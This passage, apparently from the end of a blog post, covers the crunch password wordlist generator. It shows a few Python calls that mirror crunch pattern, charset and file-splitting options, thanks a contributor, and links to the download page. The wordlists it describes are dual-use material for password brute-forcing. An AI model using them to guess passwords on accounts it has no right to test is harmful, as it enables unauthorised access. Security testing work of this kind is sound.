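    # ./crunch 6 6 -t @dog%^ ABCD 1234 @#$%  -> 4 * 4 * 4 = 64 words
    print(count_words("@dog%^", alpha="ABCD", numeric="1234", symbols="@#$%"))
    # ./crunch 4 4 -f charset.lst lalpha -o START -c 100000 -> 26^4 words, 5 files
    print(estimate_split("@@@@", lines_per_file=100000))
    print(list(permute("dog")), list(permute(["cat", "dog", "pig"])))
```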
<br />
<br />
<br />
There are many options and it truly is a great tool.<br />
<br />
<br />
Thanks to bofh28 for reading my ramblings and thanks for this awesome tool !<br />
<br />
<br />
The latest build can be downloaded at ;<br />
<br />
<a href="http://sourceforge.net/projects/crunch-wordlist/"><b>http://sourceforge.net/projects/crunch-wordlist/</b></a>Unknownnoreply@blogger.com156